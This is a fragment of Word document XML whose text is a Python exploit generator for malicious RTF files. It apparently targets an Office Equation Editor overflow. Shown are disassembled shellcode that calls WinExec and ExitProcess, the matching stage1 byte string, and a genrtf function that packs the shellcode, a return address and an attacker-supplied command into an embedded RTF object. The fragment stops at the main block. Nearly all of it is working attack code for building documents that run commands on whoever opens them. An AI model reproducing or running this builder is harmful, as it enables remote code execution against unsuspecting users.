        <w:t>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illShape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1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illUseRect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NoFillHitTest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Line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PreferRelativeResize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1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ReallyHidden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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB23F99" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t>{\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>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ScriptAnchor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FakeMaster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CameFromImgDummy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0}}{\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>{\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>fLayoutInCell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>}{\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>sv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273EA2B5" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>\picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F4B03A" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:lastRenderedPageBreak/>
        <w:t>00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>}}\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>par}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E197CEF" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DAAAD3" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">#0:  b8 44 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>eb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> 71 12          mov    eax,0x1271eb44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D83DDD" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">#5:  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>ba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> 78 56 34 12          mov    edx,0x12345678</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CA1FA0" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">#a:  31 d0                   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>xor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>eax,edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="002C1CE3" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">#c:  8b 08                   mov    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>ecx,DWORD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> PTR [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375CE930" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">#e:  8b 09                   mov    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>ecx,DWORD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> PTR [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026A9D2D" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">#10: 8b 09                   mov    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>ecx,DWORD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> PTR [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1C74D4" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t>#12: 66 83 c1 3c             add    cx,0x3c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BACCAD" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">#16: 31 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">                   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>xor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>ebx,ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="464AC34B" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">#18: 53                      push   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D32E1CC" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">#19: 51                      push   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="640D28DF" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t>#1a: be 64 3e 72 12          mov    esi,0x12723e64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E5E414" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">#1f: 31 d6                   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>xor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>esi,edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="796BB0C6" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t>#21: ff 16                   call   DWORD PTR [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">] // call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33699025" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">#23: 53                      push   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73CBAACA" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">#24: 66 83 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>ee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> 4c             sub    si,0x4c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6763EEEF" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t>#28: ff 10                   call   DWORD PTR [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">] // call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7FD221DC" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t>stage1="\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B69E95C" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="692A52C0" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B571E9" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"># pads with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26DFA92D" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t>stage1=stage1.ljust(44,'\x90')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D69D94B" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10C20A0F" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>genrtf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>cmd,r</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>_head</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F08A601" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>) &gt; 109:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D57C49" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">        print "[!] Primitive command must be shorter than 109 bytes"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0DC32D" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>sys.exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51057A33" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    payload='\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x0</w:t>
      </w:r>
      <w:r w:rsidRPr="00277FB0">
        <w:lastRenderedPageBreak/>
        <w:t>0\x00\xc8\xa7\\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>\x00\xc4\xee[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2DE319" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    payload+=stage1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6E177E" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    payload+=pack('&lt;I',0x00402114) # ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7387F557" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    payload+='\x00'*2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DC1021" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    payload+=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32638FD7" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    payload=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>payload.ljust</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>(197,'\x00')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3091FA62" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B3F3BD2" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>r_head+objclass+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>payload.encode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>('hex')+tail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E6C64C" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="775237BC" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>getrheader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>(file):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28311751" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>input_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> = open(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>file,"r</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>).read</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E58472D" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>r_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>input_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>file.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>("{\*\datastore")[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF97DD" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>r_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A61BF58" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F66670" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
